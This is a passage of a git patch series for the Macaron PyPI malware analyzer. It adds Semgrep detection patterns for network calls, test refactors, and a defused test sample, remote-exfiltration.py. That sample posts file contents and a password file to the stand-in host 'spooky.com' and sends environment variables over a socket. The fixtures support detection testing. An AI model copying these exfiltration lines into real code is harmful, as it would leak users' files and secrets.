httpx.AsyncClient(...) - - pattern: httpx.AsyncHTTPTransport(...) 
- - pattern: httpx.Client(...) - - pattern: httpx.Request(...) + - pattern: httpx.patch(...) + - pattern: httpx.AsyncClient(...).request(...) + - pattern: httpx.AsyncClient(...).get(...) + - pattern: httpx.AsyncClient(...).post(...) + - pattern: httpx.AsyncClient(...).put(...) + - pattern: httpx.AsyncClient(...).delete(...) + - pattern: httpx.AsyncClient(...).head(...) + - pattern: httpx.AsyncClient(...).options(...) + - pattern: httpx.AsyncClient(...).stream(...) + - pattern: httpx.AsyncClient(...).patch(...) + - pattern: httpx.AsyncClient(...).send(...) + - pattern: httpx.Client(...).request(...) + - pattern: httpx.Client(...).get(...) + - pattern: httpx.Client(...).post(...) + - pattern: httpx.Client(...).put(...) + - pattern: httpx.Client(...).delete(...) + - pattern: httpx.Client(...).head(...) + - pattern: httpx.Client(...).options(...) + - pattern: httpx.Client(...).stream(...) + - pattern: httpx.Client(...).patch(...) + - pattern: httpx.Client(...).send(...) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index f6ef8386d..c74122458 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -106,6 +106,7 @@ rules: severity: ERROR mode: taint options: + # This will help detect partial things over multiple lines like: "x = builtins.bytes; x.decode(...)" symbolic_propagation: true pattern-sources: - pattern-either: @@ -171,23 +172,45 @@ rules: - pattern: requests.delete(...) - pattern: requests.head(...) - pattern: requests.options(...) - - pattern: requests.Session(...) + - pattern: requests.patch(...) + - pattern: requests.Session(...).get(...) + - pattern: requests.Session(...).delete(...) + - pattern: requests.Session(...).head(...) + - pattern: requests.Session(...).options(...) + - pattern: requests.Session(...).patch(...) + - pattern: requests.Session(...).post(...) 
+ - pattern: requests.Session(...).put(...) + - pattern: requests.Session(...).request(...) + - pattern: requests.Session(...).send(...) - pattern: requests.Request(...) # using urllib3 module - - pattern: urllib3.PoolManager(...) - pattern: urllib3.request(...) + # object creation here is included as decoded values may be passed as parameters + - pattern: urllib3.PoolManager(...) + - pattern: urllib3.PoolManager(...).request(...) + - pattern: urllib3.PoolManager(...).request_encode_body(...) + - pattern: urllib3.PoolManager(...).request_encode_url(...) + - pattern: urllib3.PoolManager(...).urlopen(...) - pattern: urllib3.HTTPConnectionPool(...) + - pattern: urllib3.HTTPConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).request(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_url(...) - pattern: urllib3.HTTPSConnectionPool(...) - - pattern: urllib3.ConnectionPool(...) - - pattern: urllib3.ProxyManager(...) - - pattern: urllib3.contrib.socks.SOCKSProxyManager(...) + - pattern: urllib3.HTTPSConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPSConnectionPool(...).request(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPConnection(...) + - pattern: urllib3.HTTPConnection(...).request(...) + - pattern: urllib3.HTTPConnection(...).request_chunked(...) + - pattern: urllib3.HTTPSConnection(...) + - pattern: urllib3.HTTPSConnection(...).request(...) + - pattern: urllib3.HTTPSConnection(...).request_chunked(...) + - pattern: urllib3.ProxyManager(...).urlopen(...) # using urllib - pattern: urllib.request(...) - pattern: urllib.request.urlopen(...) - # using urlrequest module - - pattern: UrlRequest(...) - - pattern: UrlRequestRequests(...) - - pattern: UrlRequestUrllib(...) # using httpx - pattern: httpx.request(...) 
- pattern: httpx.get(...) @@ -197,10 +220,29 @@ rules: - pattern: httpx.head(...) - pattern: httpx.options(...) - pattern: httpx.stream(...) + - pattern: httpx.patch(...) - pattern: httpx.AsyncClient(...) - - pattern: httpx.AsyncHTTPTransport(...) + - pattern: httpx.AsyncClient(...).request(...) + - pattern: httpx.AsyncClient(...).get(...) + - pattern: httpx.AsyncClient(...).post(...) + - pattern: httpx.AsyncClient(...).put(...) + - pattern: httpx.AsyncClient(...).delete(...) + - pattern: httpx.AsyncClient(...).head(...) + - pattern: httpx.AsyncClient(...).options(...) + - pattern: httpx.AsyncClient(...).stream(...) + - pattern: httpx.AsyncClient(...).patch(...) + - pattern: httpx.AsyncClient(...).send(...) - pattern: httpx.Client(...) - - pattern: httpx.Request(...) + - pattern: httpx.Client(...).request(...) + - pattern: httpx.Client(...).get(...) + - pattern: httpx.Client(...).post(...) + - pattern: httpx.Client(...).put(...) + - pattern: httpx.Client(...).delete(...) + - pattern: httpx.Client(...).head(...) + - pattern: httpx.Client(...).options(...) + - pattern: httpx.Client(...).stream(...) + - pattern: httpx.Client(...).patch(...) + - pattern: httpx.Client(...).send(...) 
# process spawning # using subprocess module diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json new file mode 100644 index 000000000..17621c84b --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json @@ -0,0 +1,19 @@ +{ + "src.macaron.resources.pypi_malware_rules.remote-exfiltration": [ + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py", + "start": 31, + "end": 31 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py", + "start": 42, + "end": 42 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py", + "start": 50, + "end": 50 + } + ] +} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py new file mode 100644 index 000000000..2ab4a9e14 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py @@ -0,0 +1,50 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. 
This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + # NOTE: since these are flows, all will go in subfunctions that they are supposed to be in so the detections + # can be sections out. + + def os_to_requests(): + import os + + import requests + with os.popen("cat important_file") as pipe: + requests.post("spooky.com", data=pipe.read()) + + def file_exfil_to_urllib3(): + import os as oo + + import urllib3 as uuu + op = oo.O_RDWR + do_it = oo.open + file = do_it("every_password", op) + man = uuu.PoolManager + http = man().request + http('POST', "spooky.com", body=oo.read(file, 2048)) + + def environ_to_socket(): + import socket as s + from os import environ as environment_vars + with s.socket(s.AF_INET, s.SOCK_STREAM) as soc: + soc.connect(('localhost', 0)) + other = soc + other.send(environment_vars) diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py index 2e30b1e33..ffc3e2ef6 100644 --- a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -33,20 +33,27 @@ def test_no_sourcecode(pypi_package_json: MagicMock) -> None: @pytest.mark.skip(reason="experimental feature") -def test_obfuscation_rules(pypi_package_json: MagicMock) -> None: +@pytest.mark.parametrize( + # the sourcecode sample directory under resources/sourcecode_samples and the semgrep rule under resources/pypi_malware_rules + ("sourcecode_sample_dir", "rule_file"), + [ + pytest.param("obfuscation", "obfuscation.yaml", id="obfuscation"), + pytest.param("exfiltration", "exfiltration.yaml", id="exfiltration"), + ], +) +def test_rules(pypi_package_json: MagicMock, sourcecode_sample_dir: str, rule_file: str) -> None: """Test the semgrep rules for obfuscation on code samples.""" sample_path = os.path.join( - os.path.dirname(os.path.abspath(__file__)), "resources", 
"sourcecode_samples", "obfuscation" + os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples", sourcecode_sample_dir ) with open(os.path.join(sample_path, "expected_results.json"), encoding="utf-8") as file: expected_results = json.loads(file.read()) - __import__("pprint").pprint(expected_results) analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) pypi_package_json.package_sourcecode_path = sample_path - analyzer.default_rule_path = os.path.join(analyzer.default_rule_path, "obfuscation.yaml") + analyzer.default_rule_path = os.path.join(analyzer.default_rule_path, rule_file) result, analysis = analyzer.analyze(pypi_package_json) From 376f7989a3101bcc0a20231046b60ba2a37a9a23 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Wed, 5 Feb 2025 11:00:48 +1000 Subject: [PATCH 10/37] test: testing for invalid pathways in defaults configuration --- .../sourcecode/pypi_sourcecode_analyzer.py | 63 +------------------ .../pypi/test_pypi_sourcecode_analyzer.py | 63 +++++++++++++++++-- 2 files changed, 61 insertions(+), 65 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index e3c325690..ae2864109 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -21,17 +21,13 @@ from macaron.config.defaults import defaults from macaron.config.global_config import global_config -from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError, SourceCodeError +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError from macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult from macaron.slsa_analyzer.package_registry.pypi_registry 
import PyPIPackageJsonAsset logger: logging.Logger = logging.getLogger(__name__) -IMPORTS = "imports" -CONSTANTS = "constants" -CALLS = "calls" - class PyPISourcecodeAnalyzer: """This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress. @@ -52,8 +48,6 @@ class PyPISourcecodeAnalyzer: of the package. """ - EXPECTED_PATTERN_CATEGORIES = [IMPORTS, CONSTANTS, CALLS] - def __init__(self, resources_path: str = global_config.resources_path) -> None: """Collect required data for analysing the source code.""" self.default_rule_path, self.custom_rule_path = self._load_defaults(resources_path) @@ -191,57 +185,6 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes return result, dict(analysis_result) - def analyze_dataflow(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: - """Analyze the source code of the package for malicious dataflow. - - This is the second phase of the source code analyzer. Currently, this function is a placeholder for future - work. - - Parameters - ---------- - pypi_package_json: PyPIPackageJsonAsset - The PyPI package JSON asset object. - - Returns - ------- - tuple[HeuristicResult, dict[str, JsonType]] - Containing the analysis results and relevant dataflows identified. - - Raises - ------ - HeuristicAnalyzerValueError - if there is no source code available. 
- """ - analysis_result: dict = {} - result: HeuristicResult = HeuristicResult.SKIP - - try: - for filename, content in pypi_package_json.iter_sourcecode(): - try: - _ = ast.parse(content.decode("utf-8")) - except (SyntaxError, ValueError) as ast_parse_error: - logger.debug("File %s cannot be parsed as a python file: %s", filename, ast_parse_error) - continue - - # tracer = DataFlowTracer() - # tracer.generate_symbol_table(content) - - # functioncall_analyzer = FunctionCallAnalyzer(self.suspicious_pattern, tracer) - # is_malware, detail_info = functioncall_analyzer.analyze(content) - # if is_malware: - # result = HeuristicResult.FAIL - - # # TODO: Currently, the result collector does not handle the situation that - # # multiple same filename. In the future, this will be replace with absolute path. - # if detail_info: - # analysis_result[filename] = detail_info - except SourceCodeError as sourcecode_error: - error_msg = "Unable to retrieve PyPI package source code" - logger.debug(error_msg) - raise HeuristicAnalyzerValueError(error_msg) from sourcecode_error - - return result, analysis_result - class DataFlowTracer(ast.NodeVisitor): """The class is used to create the symbol table and analyze the dataflow.""" @@ -354,8 +297,8 @@ def visit_Module(self, node: ast.Module) -> None: # noqa: N802 # pylint: disabl def visit_Call(self, node: ast.Call) -> None: # noqa: N802 # pylint: disable=C0103 """Visit the Call node.""" - suspicious_calls: dict = self.suspicious_patterns[CALLS] - suspicious_const: dict = self.suspicious_patterns[CONSTANTS] + suspicious_calls: dict = self.suspicious_patterns["calls"] + suspicious_const: dict = self.suspicious_patterns["constants"] function_call: str = ast.unparse(node.func) args: str = " ".join([ast.unparse(arg) for arg in node.args]) expr: str = ast.unparse(node) diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py index ffc3e2ef6..658c8cd59 100644 --- 
a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -4,7 +4,7 @@ """Tests for experimental feature detecting malicious patterns in PyPI package sourcecode.""" import json import os -from unittest.mock import MagicMock +from unittest.mock import MagicMock, patch import pytest @@ -14,14 +14,59 @@ from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer -@pytest.mark.skip(reason="experimental feature") def test_no_resources() -> None: """Test for when the semgrep rules can't be found, so error.""" with pytest.raises(ConfigurationError): _ = PyPISourcecodeAnalyzer(resources_path="") -@pytest.mark.skip(reason="experimental feature") +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_no_defaults_section(mock_defaults: MagicMock) -> None: + """Test for when the heuristics.pypi in defaults isn't defined at all, so error.""" + mock_defaults.has_section.side_effect = lambda _: False + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_no_custom_path(mock_defaults: MagicMock) -> None: + """Test for when a default path isn't provided, so the custom rule path should be None.""" + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda _: (MagicMock(get=MagicMock(return_value=None))) + analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + assert analyzer.custom_rule_path is None + + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + 
MagicMock(get=MagicMock(return_value="" if section == "heuristic.pypi" else None)) + ) + analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + assert analyzer.custom_rule_path is None + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_nonexistent_rule_path(mock_defaults: MagicMock) -> None: + """Test for when the custom path provided does not exist, so error.""" + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=MagicMock(return_value="some_random_path" if section == "heuristic.pypi" else None)) + ) + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_invalid_custom_rules(mock_defaults: MagicMock) -> None: + """Test for when the provided file is not a valid semgrep rule, so error,""" + # use this file as an invalid semgrep rule as it is most definitely not a semgrep rule, and does exist + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=MagicMock(return_value=os.path.abspath(__file__) if section == "heuristic.pypi" else None)) + ) + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + + def test_no_sourcecode(pypi_package_json: MagicMock) -> None: """Test for when there is no source code available, so error.""" analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) @@ -32,7 +77,7 @@ def test_no_sourcecode(pypi_package_json: MagicMock) -> None: analyzer.analyze(pypi_package_json) 
-@pytest.mark.skip(reason="experimental feature") +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") @pytest.mark.parametrize( # the sourcecode sample directory under resources/sourcecode_samples and the semgrep rule under resources/pypi_malware_rules ("sourcecode_sample_dir", "rule_file"), @@ -41,7 +86,9 @@ def test_no_sourcecode(pypi_package_json: MagicMock) -> None: pytest.param("exfiltration", "exfiltration.yaml", id="exfiltration"), ], ) -def test_rules(pypi_package_json: MagicMock, sourcecode_sample_dir: str, rule_file: str) -> None: +def test_rules( + mock_defaults: MagicMock, pypi_package_json: MagicMock, sourcecode_sample_dir: str, rule_file: str +) -> None: """Test the semgrep rules for obfuscation on code samples.""" sample_path = os.path.join( os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples", sourcecode_sample_dir @@ -50,6 +97,12 @@ def test_rules(pypi_package_json: MagicMock, sourcecode_sample_dir: str, rule_fi with open(os.path.join(sample_path, "expected_results.json"), encoding="utf-8") as file: expected_results = json.loads(file.read()) + # test defaults without custom rule path + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=MagicMock(return_value="" if section == "heuristic.pypi" else None)) + ) + analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) pypi_package_json.package_sourcecode_path = sample_path From d25bb69a0d6e62460d785078ed45baaafe49af6b Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Wed, 5 Feb 2025 12:30:30 +1000 Subject: [PATCH 11/37] feat: dependency on empty project link, and context manager for sourcecode download --- .../sourcecode/pypi_sourcecode_analyzer.py | 15 ++++-- .../checks/detect_malicious_metadata_check.py | 46 ++++++++++++++----- .../package_registry/pypi_registry.py | 
11 ++++- 3 files changed, 55 insertions(+), 17 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index ae2864109..f5931cb33 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -23,13 +23,14 @@ from macaron.config.global_config import global_config from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError from macaron.json_tools import JsonType, json_extract -from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult +from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset logger: logging.Logger = logging.getLogger(__name__) -class PyPISourcecodeAnalyzer: +class PyPISourcecodeAnalyzer(BaseHeuristicAnalyzer): """This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress. This analyzer works in two phases. In the first phase, it will perform a pattern-based scan of all python files @@ -48,8 +49,14 @@ class PyPISourcecodeAnalyzer: of the package. 
""" - def __init__(self, resources_path: str = global_config.resources_path) -> None: - """Collect required data for analysing the source code.""" + def __init__(self, resources_path: str | None = None) -> None: + super().__init__( + name="anomalous_version_analyzer", + heuristic=Heuristics.SUSPICIOUS_PATTERNS, + depends_on=[(Heuristics.EMPTY_PROJECT_LINK, HeuristicResult.FAIL)], + ) + if resources_path is None: + resources_path = global_config.resources_path self.default_rule_path, self.custom_rule_path = self._load_defaults(resources_path) def _load_defaults(self, resources_path: str) -> tuple[str, str | None]: diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 9c99b8062..9b056da4c 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -13,7 +13,7 @@ from macaron.database.db_custom_types import DBJsonDict from macaron.database.table_definitions import CheckFacts -from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError, SourceCodeError from macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics @@ -100,27 +100,45 @@ def _should_skip( return True return False - def analyze_source(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + def analyze_source( + self, pypi_package_json: PyPIPackageJsonAsset, results: dict[Heuristics, HeuristicResult] + ) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the source code of the package with a textual scan, looking for malicious code patterns. 
Parameters ---------- pypi_package_json: PyPIPackageJsonAsset The PyPI package JSON asset object. + results: dict[Heuristics, HeuristicResult] + Containing all heuristics' results (excluding this one), where the key is the heuristic and the value is the result + associated with that heuristic. Returns ------- tuple[HeuristicResult, dict[str, JsonType]] Containing the analysis results and relevant patterns identified. + + Raises + ------ + HeuristicAnalyzerValueError + If the analyzer fails due to malformed package information. + ConfigurationError + If the configuration of the analyzer encountered a problem. """ logger.debug("Instantiating %s", PyPISourcecodeAnalyzer.__name__) - try: - sourcecode_analyzer = PyPISourcecodeAnalyzer() - return sourcecode_analyzer.analyze(pypi_package_json) - except (ConfigurationError, HeuristicAnalyzerValueError) as source_code_error: - logger.debug("Unable to perform source code analysis: %s", source_code_error) + analyzer = PyPISourcecodeAnalyzer() + + if analyzer.depends_on and self._should_skip(results, analyzer.depends_on): return HeuristicResult.SKIP, {} + try: + with pypi_package_json.sourcecode(): + return analyzer.analyze(pypi_package_json) + except SourceCodeError as error: + error_msg = f"Unable to perform analysis, source code not available: {error}" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) from error + def evaluate_heuristic_results( self, heuristic_results: dict[Heuristics, HeuristicResult] ) -> tuple[float, JsonType]: @@ -299,9 +317,15 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: confidence = Confidence.HIGH result_type = CheckResultType.PASSED - # experimental analyze sourcecode feature - if ctx.dynamic_data["analyze_source"] and pypi_package_json.download_sourcecode(): - sourcecode_result, sourcecode_detail_info = self.analyze_source(pypi_package_json) + # experimental sourcecode analysis feature + if ctx.dynamic_data["analyze_source"]: + try: + sourcecode_result, 
sourcecode_detail_info = self.analyze_source( + pypi_package_json, heuristic_results + ) + except (HeuristicAnalyzerValueError, ConfigurationError): + return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN) + heuristic_results[Heuristics.SUSPICIOUS_PATTERNS] = sourcecode_result heuristics_detail_info.update(sourcecode_detail_info) @@ -311,8 +335,6 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: confidence = Confidence.LOW result_type = CheckResultType.FAILED - pypi_package_json.cleanup_sourcecode() - result_tables.append( MaliciousMetadataFacts( result=heuristic_results, diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index f3d349d8f..8f86f0dc1 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -10,7 +10,8 @@ import tarfile import tempfile import urllib.parse -from collections.abc import Callable, Iterator +from collections.abc import Callable, Generator, Iterator +from contextlib import contextmanager from dataclasses import dataclass from datetime import datetime @@ -557,6 +558,14 @@ def get_latest_release_upload_time(self) -> str | None: return upload_time return None + @contextmanager + def sourcecode(self) -> Generator[None]: + """Download and cleanup source code of the package with a context manager.""" + if not self.download_sourcecode(): + raise SourceCodeError("Unable to download package source code.") + yield + self.cleanup_sourcecode() + def download_sourcecode(self) -> bool: """Get the source code of the package and store it in a temporary directory. 
From 8ad1b19442799333428a0786bed7f4362478bd51 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Wed, 5 Feb 2025 16:32:10 +1000 Subject: [PATCH 12/37] chore: added pre-commit hook for sourcecode sample files execution permissions --- .pre-commit-config.yaml | 12 +++++++++++ .../samples_permissions_checker.sh | 20 +++++++++++++++++++ 2 files changed, 32 insertions(+) create mode 100755 scripts/dev_scripts/samples_permissions_checker.sh diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index 16c2ff3fa..034608f19 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -203,6 +203,18 @@ repos: always_run: true pass_filenames: false +# Checks that tests/malware_analyzer/pypi/resources/sourcecode_samples files do not have executable permissions +# This is another measure to make sure the files can't be accidentally executed +- repo: local + hooks: + - id: sourcecode-sample-permissions + name: Sourcecode sample executable permissions checker + entry: scripts/dev_scripts/samples_permissions_checker.sh + language: system + always_run: true + pass_filenames: false + + # A linter for Golang - repo: https://github.com/golangci/golangci-lint rev: v1.64.6 diff --git a/scripts/dev_scripts/samples_permissions_checker.sh b/scripts/dev_scripts/samples_permissions_checker.sh new file mode 100755 index 000000000..7f3d9604f --- /dev/null +++ b/scripts/dev_scripts/samples_permissions_checker.sh @@ -0,0 +1,20 @@ +#!/usr/bin/env bash + +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +# +# Checks if the files in tests/malware_analyzer/pypi/resources/sourcecode_samples have executable permissions, +# failing if any do. +# + +MACARON_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && cd ../.. 
&& pwd)" +SAMPLES_PATH="${MACARON_DIR}/tests/malware_analyzer/pypi/resources/sourcecode_samples" + +# any files have any of the executable bits set +executables=$(find "$SAMPLES_PATH" -type f -perm -u+x -o -type f -perm -g+x -o -type f -perm -o+x) +if [ -n "$executables" ]; then + echo "The following files should not have any executable permissions:" + echo "$executables" + exit 1 +fi From 2469e8611566a5fed805c4890696835b89e35565 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 6 Feb 2025 14:20:35 +1000 Subject: [PATCH 13/37] fix: path outputs are now relative to package, making tests work and better --- .../sourcecode/pypi_sourcecode_analyzer.py | 6 +- .../exfiltration/expected_results.json | 6 +- .../obfuscation/expected_results.json | 176 +++++++++--------- 3 files changed, 95 insertions(+), 93 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index f5931cb33..808f5e568 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -182,12 +182,14 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes result = HeuristicResult.FAIL # some semgrep rules were triggered for finding in semgrep_findings: category = json_extract(finding, ["check_id"], str) - if not category: + file = json_extract(finding, ["path"], str) + if not category or not file: continue - file = json_extract(finding, ["path"], str) + file = os.path.relpath(file, os.path.dirname(source_code_path)) start = json_extract(finding, ["start", "line"], int) end = json_extract(finding, ["end", "line"], int) + analysis_result[category].append({"file": file, "start": start, "end": end}) return result, dict(analysis_result) diff --git 
a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json index 17621c84b..33b4d6716 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json @@ -1,17 +1,17 @@ { "src.macaron.resources.pypi_malware_rules.remote-exfiltration": [ { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py", + "file": "exfiltration/remote-exfiltration.py", "start": 31, "end": 31 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py", + "file": "exfiltration/remote-exfiltration.py", "start": 42, "end": 42 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py", + "file": "exfiltration/remote-exfiltration.py", "start": 50, "end": 50 } diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index 03bf0858b..1da7cb255 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -1,448 +1,448 @@ { "src.macaron.resources.pypi_malware_rules.decode-and-execute": [ { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 30, "end": 30 }, { - "file": 